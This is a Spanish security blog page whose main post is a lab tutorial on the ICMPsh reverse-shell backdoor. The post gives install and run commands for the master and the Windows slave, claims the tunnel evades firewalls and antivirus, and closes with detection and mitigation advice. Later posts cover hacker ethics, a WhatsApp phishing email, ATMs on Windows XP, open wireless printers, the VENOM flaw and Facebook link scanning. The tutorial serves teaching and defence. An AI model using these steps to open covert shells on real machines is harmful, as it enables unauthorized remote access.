Que es ICMPsh? Funcionamiento, detección y mitigacion PASO a PASO. Palabra clave [W1nd0ws_B4ckD00r]

Antes que todo un inmenso saludo, un inmenso HOLA_MUNDO a todos los que se toman el tiempo de leer mis artículos, en verdad espero les sean de utilidad ya que los comparto con todo el animo del mundo, después de las palabras de bienvenida vamos a los que nos toca, explicare paso a paso de forma detallada y sencilla que es y como funciona ICMPsh, asi como la forma de mitigar la vulnerabilidad.

Que es una Shell remota, un backdoor (puerta trasera), una shell de conexión inversa, etc… Pues básicamente vienen a ser lo mismo y la definición mas o menos globalizada es:

Es una conexión remota por lo general no autorizada a un sistema informático o infraestructura de red, dando acceso remoto a dicho sistema.

La verdad no es nada nuevo en el mundo de la seguridad, el concepto sigue siendo el mismo, lo que evoluciona es la forma en la que se consiguen esos accesos, desde el mismo programador de alguna App que troyaniza la misma, hasta un SysAdmin que por razones de comodidad deja una puerta trasera para entrar y reparar cosas de forma remota, en esta entrada quiero presentarles ICMPsh, ya tiene varios años de creada pero la considero uno de los backdoors mas sorprendes por varias razones que mas adelante explicare.

Para explicar el funcionamiento y la forma de mitigar el mismo la entrada estará dividida en dos partes, una sera a modo de explicación de conceptos y otra sera totalmente practica usando un entorno virtualizado.

Vamos por partes…

“Jack el destripador”

Que es ICMP?

ICMP (Internet_Control_Message_Protocol) es un hijo del protocolo TCP/IP y es algo así como el vigilante de la red, ya que se encarga de diagnosticar posibles errores y hace de apoyo a otros protocolos, esta definido en el RFC792 y esta claramente especificada la razón por la que fue creado.

Básicamente este protocolo usa diferentes tipos de mensajes ICMP de acuerdo a la condición o circunstancia que sean requeridas. Para entenderlo de una forma un poco sencilla podríamos decir que un paquete ICMP se encapsula dentro de un paquete IP, la estructura seria algo así:

estructura ICMP

En donde vemos claramente 20 bytes (160 bits) para el encabezo IP donde tenemos como campos importantes la direcciones IP de Origen/Destino, pues dentro de ese paquete a modo de sub protocolo esta el paquete ICMP que puede ser de 8 bytes (64bits) en adelante dependiendo el payload que lleve.

Bien en esta entrega vamos a enfocarnos en el campo “Dirección IP origen”“Dirección IP destino” del encabezado IP y en el campo “Tipo de mensaje” del encabezado ICMP

Si fueron lo suficientemente temerarios y le dieron click al enlace que habla de los tipos de paquetes ICMP habrán notado la cantidad abrumadora de tipos de mensajes que puede llevar un paquete ICMP, pero en esta entrega solo nos fijaremos en los tipos de mensaje 8 (Echo Solicitud de eco) y y tipo de mensaje 0 (Echo reply respuesta de eco)

Para comprender mejor el funcionamiento de ICMP vamos a usarlo y analizar las cabeceras con Wireshark, para estos fines tengo el siguiente laboratorio:

Maquina virtual (Windows 7) [Victima] – 10.0.0.14/24 adaptador de red en modo puente

Maquina física (Debian 8) [Atacante] – 10.0.0.5/24

Hagamos un ping normal a la maquina virtual:

ping10004

Ping a la maquina virtual 10.0.0.4

Muy bien ahora vayámonos al Wireshark y veamos que a capturado el tiburón…

capturaping

Ummm interesante, pero porque si solo fueron 10 intentos de ping tenemos 20 capturas en Wireshark?, pues por cada intento de ping (Echo tipo de mensaje 8) tenemos una respuesta (Echo reply tipo de mensaje 0), lo que según las matemáticas dan 10 solicitudes  + 10 respuestas = 20 capturas, y si analizamos un paquete en detalle veremos lo siguiente:

detallerequest

 

Vemos en el encabezado las direcciones de origen y destino en Type alcanzamos a ver un numero 8 que como hemos dicho corresponde a una solicitud de echo (Echo request), y entonces donde esta la respuesta a esta solicitud? pues solo hay que analizar el siguiente paquete:

detalle reply

y del mismo modo si el encabezado vemos las dirección IP de origen y destino, así como el tipo de mensaje 0 (Echo reply)

Bueno, esta es la forma en que normalmente funciona ICMP, en verdad no quería caer en explicaciones tan complicadas, pero si vamos a comprender algo tenemos que hacerlo bien, ademas el titulo dice PASO a PASO, no esperaran un breve paseo verdad?

Ok entendido, pero de donde sale ICMPsh?

Pues precisamente para mi hackear significa llevar las tecnologías mas allá de las fronteras para las que fueron creadas, empujarlas un poco mas de su propósito, realmente ya existían otras herramientas para establecer conexiones remotas pero era necesario tener privilegios administrativos para su ejecución y aquí es donde llega Leidecker y escribe una genial herramienta llamada ICMPsh que a diferencia de otras no necesitaba tener dichos permisos, haciéndose mas limpia y elegante de utilizar, poco después Bernardo Damele la llevo a Python y Nico la compilo para C y Pearl, a ellos el credito y el respeto de la comunidad por su trabajo.

Como todos los backdoor esta herramienta consta de dos partes, una es el Master que es multiplataforma, es decir podemos hacerlo funcionar en tanto en Windows como en sistemas Unix, y la otra es el Slave que funciona solamente en sistemas Windows, hasta ahora en todas sus versiones, como instalare el Master en mi sistema Debian, clonare el repositorio y lo haré correr desde la terminal con los siguientes comando:

sudo apt-get install python-impacket              #Librería necesaria
git clone https://github.com/inquisb/icmpsh.git   #Clonamos el directorio
cd icmpsh/                                        #Nos movemos al directorio

Una vez nos posicionamos en el directorio tenemos varias formas de lanzar la herramienta, una es ejecutando el script run.sh la cual es mas bonito y todo y sale una interfaz dándote la bienvenida y pidiéndote amablemente la dirección IP de la victima, etc…

runsh

La cual esta muy bonita la verdad pero prefiero tirar un comando por mi cuenta en la terminal, utilizando el verdadero código detrás de la herramienta..

lanzamiento

Esto pone mi maquina a la escucha esperando conexiones entrantes desde la 10.0.0.15, pero como sabrán no entrara ninguna conexión si no conseguimos ejecutar icmpsh.exe en la victima con los parámetros adecuados, así que el como se los dejare a ustedes esto exclusivamente didáctico, así que continuamos. En la maquina victima navegamos hasta el directorio donde tenemos icmpsh (en mi caso lo deje en el Desktop)

navegar y ejecutar

y ejecutamos:

icmpsh.exe -t 10.0.0.14 -d 500 -b 30 -s 128

Donde:

-t es la dirección ip del atacante con la que queremos conectar
-d es el delay en milisegundos entre peticiones                                                                              -b es el numero limite de solicitudes sin responder antes de cerrar la conexión                     -s Es el tamaño máximo de data que podemos enviar en cada petición

Luego de esto solo es esperar la conexión con una taza de café…

conectado

A todo esto hay que aclarar que tengo wireshark detrás monitoreando las interfaces con un filtro icmp para que solo veas esas peticiones, así que para probar que tenemos una shell remota (aunque es obvio la estamos viendo en la terminal) vamos a lanzar un inofensivo “dir” para listar los directorios en la maquina remota:

dir

paquete ICMP con el comando DIR

Recuerdan que mas arriba los paquetes ICMP tipo 0 y 8 llevaban 48 bytes de data? Eso porque el payload normalmente es el abecedario y los números del 0 al 9, pero en este caso solamente vemos 4 byte y se puede ver en el payload el comando que acabo de mandar, este comando genera al conectar con el Slave de icmpsh me devuelve otro paquete que luce así:

respuestay advertencia

Con un payload de 148 bytes y el listado de los directorios y volúmenes en la maquina comprometida, mostrándome en mi pantalla esto:

un simple dir

Y así es como me hago de una shell remota en una maquina con cualquier versión de windows, y quizás muchos se pregunten:

Pero que hay del firewall, y las restricciones administrativas para los usuarios, los antivirus, etc….?

Y la respuesta es:

hltpgs

El asunto es que como el payload viaja por un protocolo que todos los sistemas de proteccion consideran seguro ninguno se preocupa en bloquear la amenaza, no se necesitan privilegios de administrador para ejecutar el slave, si el admin bloquea el uso del cmd igual pueden escribirse un .txt y hacerlo .bat (de hecho en el directorio de la maquina virtual me hice unos cuantos para probar y funcionan sin problemas), entonces viene aqui la gran interrogante…

Como protegerse de icmpsh.

Bien, veamos la captura de cuando solicite la lista de directorios en la maquina comprometida:

respuestay advertencia

Si en el comportamiento normal de un paquete ICMP 8 & 0 el payload suele ser de 48 bytes, podemos crear una alerta en wireshark para cualquier tamaño superior a los 48 bytes llame un script (previamente LUA instalado claro) que genere una alerta….

Un momento pero se puede ajustar el tamaño del buffer de data y lo que haria seria picar el payload en trocitos y pasarlo de poco en poco para que no genere alertas…. Joder…!!! yo contra mi mismo.

Ya en serio, esto podría mitigarse fácilmente creando un ACL que permita los mensajes ICMP desde una sola maquina (la del administrador de la red), en realidad es sencillo defenderse, pero es un ataque que generalmente uno no espera. Otra opción seria instalar algun IDS/IPS como Snort y configurar la detección de payloads para que examine que el payload de ICMP lleve lo que deba llevar.

Gracias por su tiempo en leerme, espero les guste la entrada, por favor compartan y ayúdenme a llegar a mas gente, abajo les dejo los enlaces de interés.

 

Enlaces de interés.

ICMPSH Git

IDS/IPS Snort

Lua Wireshark

 

 

Anuncios

La ética como parte del espíritu hacker.

Hace un tiempo un conocido compañero de la comunidad underc0de redacto y compartió esto con nosotros, y la verdad me llego tan profundo que de cuando en vez me gusta releer esta exquisitez. Hoy quiero compartirlo con ustedes esperando sea de su agrado, y donde quieras que te encuentres Crazykade, desde aquí te mando un abrazo.

Hack-your-Password

 

LA CONDENA SOCIAL:

Una vez un amigo me dijo: “Me da miedo que sepas tanto sobre informática, me da miedo que te metas en mi ordenador, en mi casilla de correo electrónico y en mi Facebook”. Pasé mucho tiempo reflexionando sobre el significado de esas palabras. Finalmente pude ver la luz y me di cuenta de algo que cambió mi forma de pensar: “Para el común de los mortales, un hacker es un delincuente”.

Asombrado por este descubrimiento, comencé a tratar de descubrir la raíz de estos (errados) preconceptos. De esta forma, me di cuenta que el problema más grave no es que se le llame delincuente a un hacker, sino, y por el contrario, que se le llame hacker a un delincuente.

LA ÉTICA DEL HACKER:

De la misma forma que un cerrajero, basado en años de estudio, trabajo y experiencia, conoce la forma de abrir cualquier cerradura, (lo que supondría un riesgo de seguridad enorme para la sociedad), un hacker también conoce formas y métodos de vulnerar y abrir las cerraduras electrónicas. Es en este estadio en donde entra en juego la famosa “Ética Hacker”.

Haciendo uso de sus conocimientos adquiridos a priori, el cerrajero podría tranquilamente deambular por la ciudad por las noches, mientras todo el mundo duerme, abriendo las puertas de las casas y realizando hurtos. En tal caso, ya no sería un simple cerrajero, sino que se convertiría en un delincuente. En nuestro mundo de unos y ceros pasa lo mismo. Un hacker tranquilamente podría dedicarse a vulnerar empresas, personas, entidades haciendo uso de los conocimientos que posee sobre muchas y variadas ramas de las ciencias computacionales, pero de ser así, estaríamos hablando nuevamente de un delincuente, digital, pero delincuente al fin.

Para referirse a tales delincuentes, y así diferenciarlos de los verdaderos hackers, el filósofo finlandés Pekka Himanen, acuñó la palabra “Cracker” en su obra: “La ética del hacker y el espíritu de la era de la información”. También señaló que el término hacker no debe ser utilizado única y exclusivamente dentro del mundo tecnológico, sino abrir sus horizontes hacia otros ambientes:

“En el centro de nuestra era tecnológica se hallan unas personas que se autodenominan hackers. Se definen a sí mismos como personas que se dedican a programar de manera apasionada y creen que es un deber para ellos compartir la información y elaborar software gratuito. No hay que confundirlos con los crackers, los usuarios destructivos cuyo objetivo es el de crear virus e introducirse en otros sistemas: un hacker es un experto o un entusiasta de cualquier tipo que puede dedicarse o no a la informática.”

A finales de los años 50’s, cuando todo lo que tenemos hoy en materia informática y de telecomunicaciones, estaba aún en pañales, cierto grupo de gente, en los laboratorios de inteligencia artificial del MIT, empezaron a debatir sobre los principios éticos y morales a los que, teóricamente, debería responder todo este mundillo que de a poco iba naciendo. El periodista Steven Levy en su ensayo: “Hackers: Héroes de la revolución computacional”, publicado en 1984, describe ilustradamente cómo era el ambiente por aquel entonces. También enumera los principios morales antes mencionados. Entre ellos se habla de pasión, libertad, conciencia social, transparencia de la información, libre acceso a la misma, curiosidad, creatividad e interés.

LOS HACKERS EXISTEN Y ESTÁN PARA AYUDARTE:

Si tienes la suerte de conocer un hacker, descubrirás por ti mismo que, sin dudas, es una persona extraña. Probablemente retraída y de aspecto desprolijo. Claro que no existe un estereotipo de hacker, pero me baso en mi experiencia en hackmeetings (reuniones de hackers) para describirlos a grandes rasgos. No te asustes ni te intimides, suelen ser amistosos. Si tienes la posibilidad, acércate, comunícate, pregúntale cosas, pregúntale qué significa el hacking para él, por qué lo hace, cuánto tiempo lleva en esto, seguramente te sorprenderá más de una respuesta.

Los hacker están ahí, pero no para atacarnos y hacerse con nuestro perfil de Facebook, como muchos creen, sino para cuidarnos de los delincuentes que deambulan por la red de redes. Lo único que ellos necesitan de nosotros, es que cambiemos los conceptos que tenemos en nuestra mente y que los medios de comunicación, que de esto no saben nada, se implican en exponerlos como válidos y verdaderos día a día.

Un hacker no es un delincuente y un delincuente no es un hacker. Teniendo esto bien en claro, podremos discernir entre lo verdadero y lo falso cuando leamos en un diario o veamos en un noticiero un titular como “Hacker robó x cantidad de dinero de tal banco” o “Grupo de hackers se hacen con el control de más de 1000 cuentas de redes sociales”. De hecho, las noticias de los verdaderos hackers raramente las verán en un noticiero. ¿Alguna vez vieron en algún medio una noticia del estilo: “Hackers desarrollan un nuevo algoritmo de encriptación para comunicaciones inalámbricas en remplazo del antiguo y vulnerado WEP”?

Si logramos cambiar y ordenar los conceptos que tenemos sobre ciber delincuencia y hacking ético, podremos observar de un modo nuevo y diferente a Internet y al mundo de las comunicaciones digitales. Underc0de y quienes lo integran, confían y apoyan el hacking ético. Nos hemos propuesto educar al respecto tanto a los más nuevos, como a todo aquel que quiera comprender cómo funciona el underground digital. Nuestros tutoriales, cursos, competencias, artículos, recursos y servicios, están 100% orientados a suscitar la libertad de espíritu y de pensamiento en todo aquel que quiera un mundo digital libre, seguro y con información accesible para todos. A su vez, Underc0de y quienes lo hacemos posible día a día, condenamos el ciber crimen, la delincuencia digital en cualquiera de sus formas y rostros y toda actividad ilícita que de una u otra manera afecte a la integridad de un tercero sea esta física o digital y este sea persona física o entidad.

Espero que este artículo sea capaz de tocar al menos un corazón de alguien que lo lea. Si es así, mi trabajo estará cumplido. Me despido agradeciendo a Underc0de por el espacio para publicar y especialmente a mi amigo ANTRAX por animarme a escribir. Happy Hacking

CrazyKade

Ataque phising + web exploit usando falsos correos de whasapp.

Buenas noches lectores, pues la vedad el día de hoy no tenia pensado escribir nada, mas bien esta estudiando cuando de repente me dio por limpiar un poco la basura de mis cuentas de correo, cuando de repente…

BAAAAMMMM!!!!

threat

Ahí estaba un correo de certeros colores diciéndome que había recibido una nota de voz por Whatsapp…

La verdad es que se ve muy autentico y quzas hubiese funcionado con algún usuario promedio que no repara en riesgos y que solo hubiese atinado a decir:

“Ahora me mandan las notas de voz a mi correo, que eficiente se han puesto los de whatsapp”

Pero en mi caso no fue tan sencillo, ya que simplemente copie el enlace al que redirigía el famoso botón de “autoplay” y lo copie en un .txt con el fin de averiguar que tan elaborado iba este ataque, quizás algunos piensen pero cl0udswx, para que copiar el enlace si al visitarlo te vas a exponer y mi respuesta es que yo les quiero tanto que prefiero exponerme yo a que sean expuestos ustedes (esa es la versión políticamente correcta) la verdad es que tengo una maquina virtual para estas cosas, desde puedo probar enlaces, ejecutables y todo en un ambiente controlado (sandbox, firewall, IPS, y esas cosas).

Así que salte a mi maquina virtual y abrí el navegador mas odiado por todos Internet Explorer (a veces necesitamos cosas vulnerables para probar vulnerabilidades) pegue mi enlace y voila!!

Farmacia canadiense con dominios de Rumania?

Farmacia canadiense con dominios de Rumania?

Ummm… No es nada… Apaguen las alarmas…

En serio?

Noooo!!!

Es muy curioso que una pagina para vender medicinas por parte de una farmacia online canadiense tenga un dominio de Rumanía, no se a ustedes pero a mi me parece muy raro, asi que tome el CMD de Windows y lance un:

netsat -a

Para ver como iban las cosas con las peticiones y las conexiones TCP, y mi sorpresa fue aun mayor cuando encontré esto:

netstatY que son todas peticiones http desde mi maquina hacia ese extraño servidor? generalmente los puertos de origen son aleatorios en una petición http, pero si se realizan de forma sucesivamente rapida estos se suceden en cierto orden, como podemos ver están todos en el rango de los 1200 y de 65000 puertos TCP no es nada aleatorio que estén dentro de ese rango.

Y de repente me llego la imagen sublime de un ataque web exploit, en el que se nos hace visitar una pagina infectada para aprovecharse de algún exploit en nuestro navegador, algún plugin obsoleto también les vendría bien (desde cuando no actualizas el java?), quizas alguna vulnerabilidad en el flashplayer (desde cuando no actualizas tu flashplayer?).

Un ataque sencillo que por estadística sigue enganchando a los usuarios y que por tales motivos los sitios web en combinación con malos hábitos de navegación siguen siendo uno de los mayores vectores de infección, aquí les comparto algunas medidas que les ayudaran a protegerse.

  • Rápidos con la mente, lentos con el dedo. Significa pensar bien las cosas antes de aceptarlas y visitar sitios de dudosa procedencia.
  • Usa tu navegador como todo un experto en seguridad, algunos diran pero como “C#ñ$!!” hago eso, pues resulta que puedes desactivar JAVA y flashplayer para navegar y solo activarlo en caso de que alguna aplicación así lo requiera (y te preguntara asi que recuerda la regla numero 1).
  • Mantén tu software actualizado, sonara repetitivo pero es así.
  • Usa alguna suite de software que tenga antivirus, anti-malware, protección contra phishing y spam, actualizaciones en segundo plano, etc.. Yo suelo recomendar 360 Security.

Eso es todo por ahora amigos, y como les dije, la verdad no tenia pensado escribir pero me gusto tanto la notificación falsa de los chicos de whatsapp que al final no me resistí.

Saludos.

92% de cajeros ATM que aun están corriendo el difunto Windows XP.

Cuenta que hace muchos años en la mayoría del planeta las personas tenían que ir a los bancos a realizar todas y cada una de sus transacciones, incluso pequeños retiros de efectivos. Que difícil debió ser vivir por esos tiempos, gracias a la tecnología yo nací en una época en que los cajeros automáticos eran toda una realidad y pues desde mi nacimiento hasta que tuve dinero para retirar de una de esas maquinas la verdad era que ya habían proliferado a todos los rincones de mi país. Estoy seguro que yo al igual que muchos hemos disfrutado de las bondades de esas maravillosas maquinas, pero que hay de la seguridad?

BSoD en ATM

BSoD en ATM

Pues por allá por la decada de los 70 la compañía americana NCR invento estos dispositivos llamados ATM (Automatic Teller Machine) claro que no eran los magníficos dispositivos que disfrutamos hoy dia, pero con el tiempo evolucionaron a tal punto que se convirtieron en el furor de la banca privada y publica, permitiendole al usuario realizar transacciones de forma remota y sin tener que lidiar con las complicaciones que representaba ir a una sucursal, pero estos dispositivos eran básicamente computadoras, con las mismas necesidades que todas, necesitaban CPU, memoria, conexión de red y lo mas primordial necesitaban un sistema operativo, como era de esperar Microsoft no perdió tiempo e hizo los amarres para conseguir suplir a mas del 94% con su flamante sistema operativo XP (que por esos años estaba recién salido del horno) y así por casi una década todo funciono de maravilla, para todo el mundo.

Con el tiempo Microsoft fue liberando actualizaciones a las que por alguna razón llamaba Service-Pack y a medida que iban liberándose estas se aplican a todos los terminales que usaban XP incluyendo los cajeros automáticos pero una sombría mañana de junio del 2008 Microsoft anuncio que windows XP tenia los dias contados dando asi por finalizado su ciclo de vida, así que en abril del 2014 le dimos un triste adiós a Windows eXPerience (De ahi la XP).

“Pero nadie quería abandonar a Windows XP”

Y fue así como cerca del 92% de los cajeros automáticos continúan usando al día de hoy un sistema operativo con casi 14 años de antigüedad y que ya no tiene soporte por parte de Microsoft y por supuesto esto tiene sus consecuencias de seguridad, un ejecutivo de Microsoft dijo que XP ya no recibiría actualizaciones de seguridad, por lo cual un dispositivo corriendo Windows XP no debería considerarse como seguro, y por alguna razón no dejo de pensar en los cajeros automáticos en los que millones de personas gestionamos nuestras cuentas bancarias.

Estos están expuestos a gusanos, 0days, quizás un agujero en la red de un banco y mucho, pero mucho malware (Tyupkin, Neopocket, Zeus, etc..)

Sin querer sonar profético, pero podría decirse que el XPocalipsis ha llegado…!!

Pero no todo son malas noticias, NCR y demás compañías ya están seleccionando con cual sistema operativo actualizar sus maquinas, unos rumores dicen que podría ser el flamante Windows 8.1 pero otras buenas lenguas afirman que se esta pensando seriamente en un sistema basado en Linux, por su estabilidad y seguridad.

Hasta aqui el articulo de hoy respetados lectores, recuerden compartir y ayudarme llegar a mas personas.

Impresoras inalambricas, quizás un agujero en tu red.

Pues para ser sincero hay que decir, que la llegada de la tecnología 802.11 ha cambiado la forma en que usamos la tecnología, nos ha liberado de los cables y nos ha permitido hacer cualquier de cualquier rincón nuestra esquina en el ciberespacio. También es cierto que a la llegada de WEP y su posterior muerte culpa de su cifrado RC4 marcaron una etapa en la inseguridad de todas las redes inalambricas, hasta que al fin por alla por el 2004-2005 WPA2 fue ratificada como la norma de seguridad a ser usadas para entornos inalambricos y desde entonces el estándar 802.11i ha sido el equivalente al candado definitivo para nuestras redes.

Cabe aclarar sin embargo que la frase “totalmente seguro” no debe ser empleada jamas en el ámbito de la seguridad informática ya que es posible vulnerar 802.11i a base de capturar el HandShake y pasarlo por fuerza bruta para lograr encontrar el valido, así como hacerle fuerza bruta a WPS y sus combinaciones de pin, pero quiero darle un giro distinto a la seguridad de estas redes y mostrarles un nuevo agujero que quizás pase muy desapercibido para algunos administradores de red, pero que esta ahí, esperando a ser explotado.

Impresoras Inalambricas.

Generalmente cuando tenemos una impresora en la red bastaría con una poca configuración para poder compartirla con todas las estaciones y dependiendo del protocolo que utilicen estas representan riesgos en mayor o menor medida, solo basta recordar un poco cuando  Netbios y su puerto 139 TCP causo muchos dolores de cabeza a los administradores de redes, pero luego todo mejoro, llego SMB y el sol volvió a brillar en lo alto del cielo, luego llego HP con sus impresoras inalambricas que ofrecían mayor flexibilidad, mejor integración con su servicio e-print que permitía imprimir desde el smartphone, y muchas características que a la verdad mejoran la forma en la que nos desenvolvemos, pero… y la seguridad que?

Pues estas impresoras en algunos de sus modelos vienen con dos NIC, una de ellas Ethernet y la otra Wireless y aqui es donde viene la cosa, la interfaz wireless de manera predeterminada viene “Open” es decir sin método de autenticacion, y en mas de una ocasión al conectarme a la impresora he podido acceder a servicios como Internet, recursos compartidos como carpetas publicas, etc…

Impresora inalambrica sin seguridad.

Impresora inalambrica sin seguridad.

Dejando así un agujero en la pared por donde podríamos intentar muchas cosas mas, las recomendaciones:

  • Consultar con el fabricante las configuraciones predeterminadas de cada periférico que agreguemos a nuestra red.
  • Asegurar las impresoras inalambricas con seguridad WPA2 y contraseña lo suficientemente larga.
  • No compartir recursos sin alguna forma de autenticacion previa.
  • Y esta demas, pero si no es necesario para que usar estos perifericos, recuerden que se pueden compartir impresoras cableadas con dispositivos inalambricos usando SMB.

Saludos respetados blogueros y hasta una próxima entrega. Y recuerden si te gusta mi entrada comparte y permitirme llegar a mas personas.

El veneno llega a las arterias de la virtualización, VENOM aterriza en los centros de datos.

En la seguridad informática existe siempre la constante carrera entre el anuncio de un fallo de seguridad y la salida del update que hace de parche al mismo, y es durante ese tiempo que las cosas se ponen un poco tensas en los departamentos de IT de las empresas privadas y publicas. El asunto es que generalmente los que sacan partidos de la tecnología de virtualizacion se sienten un tanto seguros de esta costosa y eficiente técnica que ha venido a simplificar la vida de muchos, pero para romper con esa tranquilidad nos llega “VENOM”.

Pues desde que conocimos Heart Bleed (bug que permitía conocer las claves de cifrado privadas haciendo un volcado de la memoria del Server) no habíamos tenido tanto movimiento hasta hace unos dias cuando se ha descubierto VENOM (Virtualized Environment Neglected Operations Manipulation), esta vulnerabilidad fue descubierta por Jason Geffner Senior Security Researcher de la compañia CrowdStrike.

¿Como funciona VENOM?

Antes que todo imaginemos un entorno virtualizado donde existen varios servidores ofreciendo y supliendo las necesidades de la empresa y de los clientes, ahora imaginemos que un atacante logre comprometer un solo de esos servidores y desde ahí sea capaz de extenderse a los demas servidores virtuales e incluso al mismo sistema huesped.

Suena terrorifico verdad?

Lo mas terrible es que es totalmente posible.

Pues todo comienza con un Bug en el código del controlador FDC (Floppy Disk Controller) en QEMU, que es por mucho la tecnología mas usada por las plataformas de virtualización alrededor del mundo y quizás muchos lleguen a la conclusión de:

Pero Floppy Drive es algo totalmente obsoleto…

Y aunque es muy cierto que los Floppy Drive son algo del pasado también es cierto que la mayoría de maquinas virtuales traen por defecto al menos una unidad Floppy activada y aunque el administrador deshabilite la misma igual sigue de forma nativa el controlador para hacer funcionar la misma.

VENOM afecta directamente a QEMU 2.3.0 y sus versiones anteriores, asi como a Xen y KVM, lo que podría traducirse en decir que afecta a:

* xen:4.5.0
* redhat:enterprise_linux:5
* redhat:enterprise_linux:6
* redhat:enterprise_linux:7.0
* redhat:enterprise_virtualization:3.0
* redhat:openstack:4.0
* redhat:openstack:5.0
* redhat:openstack:6.0
* redhat:openstack:7.0

Cabe resaltar que VMware, Microsoft Hyper-V, and Bochs hypervisors no son vulnerables a VENOM.

VENOM es una vulnerabilidad existente desde el 2004 fecha en que se agrego por primera vez el controlador de Floppy Disk a QEMU.

¿Que hacer frente a VENOM?

Pues como decía al inicio del articulo la seguridad informática es la carrera entre el tiempo en el que se publica una vulnerabilidad y el tiempo que tarda esta en ser parcheada así que la mayoría de las soluciones vienen a ser las mismas para la mayoría de ellas, entre las posibles soluciones recomendadas por los chicos de CrowdStrike están:

  • Buscar e instalar las ultimas actualizaciones a medida que son desarrolladas
  • Una medida buena seria limitar el acceso de los usuarios a los servicios virtualizados.
  • Si recibes el servicio de virtualización por parte de un proveedor ponte en contacto con ellos y asegúrate de que hayan tomado las medidas necesarias.

Esto es todo por hoy, saludos mis seguros inseguros lectores, hasta el próximo articulo y recuerda si te gusto compártelo y ayúdame a llegar a mas personas.

“Recorded Future” el ojo que espia tus conversaciones en Facebook.

Tenemos que admitir que la privacidad y la seguridad de nuestras conversaciones tienen un “antes” y un “después” de Snowden, ese ex-analista de la NSA que nos mostró la delicada linea en la que se cruzan la seguridad de las naciones con la privacidad de los usuarios, desde entonces nada ha sido igual, los que alardeaban de una privacidad en sus servicios pasaron a ser mas cuidadosos, los que de por si ya eras desconfiados con la “privacidad” en la red nos convertimos en paranoicos de la criptografia.

Pues resulta que los chicos de Bosnadev estaban testeando una App y la misma se enviaba a través de enlaces mediante mensajes de chat en FB y como todos sabemos los enlaces son verificados antes de ser enviados al destinatario, lo extraño específicamente es el log de conexiones de la misma:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
13.04.2015 22:05:01 2a03:2880:3010:3ff4:face:b00c:0:1
13.04.2015 22:05:02 2a03:2880:3010:3ff6:face:b00c:0:1
13.04.2015 22:05:02 2a03:2880:3010:3ff3:face:b00c:0:1
13.04.2015 22:05:03 2a03:2880:2020:8ff0:face:b00c:0:1
13.04.2015 22:05:03 2a03:2880:2020:8ff2:face:b00c:0:1
13.04.2015 22:05:24 2a03:2880:2020:8ff4:face:b00c:0:1
13.04.2015 22:05:29 2a03:2880:20:3ff1:face:b00c:0:1
13.04.2015 22:05:31 2a03:2880:20:5ff4:face:b00c:0:1
13.04.2015 22:05:32 2a03:2880:20:cff6:face:b00c:0:1
13.04.2015 22:07:58 2a03:2880:11:2ff9:face:b00c:0:8000
13.04.2015 22:07:58 2a03:2880:2130:7ff2:face:b00c:0:1
13.04.2015 22:08:05 2a03:2880:3010:3ff2:face:b00c:0:1
13.04.2015 22:08:06 2a03:2880:3010:3ff5:face:b00c:0:1
13.04.2015 22:08:06 2a03:2880:3010:3ff7:face:b00c:0:1
13.04.2015 22:08:07 2a03:2880:3010:7ff6:face:b00c:0:1
13.04.2015 22:08:42 2a03:2880:20:4ff2:face:b00c:0:1

Desde mi punto de vista son demasiadas direcciones IPv6 para un simple chequeo.

Luego forzaron la creación de un registro de rastreo en IPv4 para una URL recién creada, lo hicieron enviándola por por el chat de facebook y leyendo el log de la URL y el resultado fue conexiones a servidores de nada mas que “Recorded Future” una empresa financiada por Google y por CIA.

En un articulo de Alex Fitzpatrick para Mashable se habla que la compañía se vale de un software que escanea las conversaciones en busca de “Keywords” para generar reportes a sus Sponsors.

Cuando enviamos un enlace usando el chat de Facebook este se busca en los motores de búsqueda y si no esta compartido públicamente entonces se analiza, “solo se analiza lo que nunca ha sido publicado”, en defensa a los resultados ellos simplemente dicen:

…our patented Web Intelligence Engine continuously analyzes the open Web…

Hay que resaltar que el software de vigilancia pone mas énfasis en usuarios que comparten enlaces en los que no existe una relación previa entre perfiles, asi como buscar ciertas frases y patrones de comportamiento encontrados en los records de cybercriminales incluso depredadores sexuales,lo cual me tranquiliza un poco mas, ya que no me están espiando, están cuidándome, preocupándose por mi.

Esto nos lleva a pensar que el mismo miedo de estar inseguros y ser blancos de un ataque no esta llevando al borde de la red, donde estamos dispuesto a sacrificar nuestra privacidad por recibir una pseudo-protección.

Esto es todo por ahora distinguidos lectores, si te gusto mi articulo comparte y ayúdame a llegar a mas personas.

Lectura recomendada:

https://bosnadev.com/

http://mashable.com/2012/07/12/facebook-scanning-chats/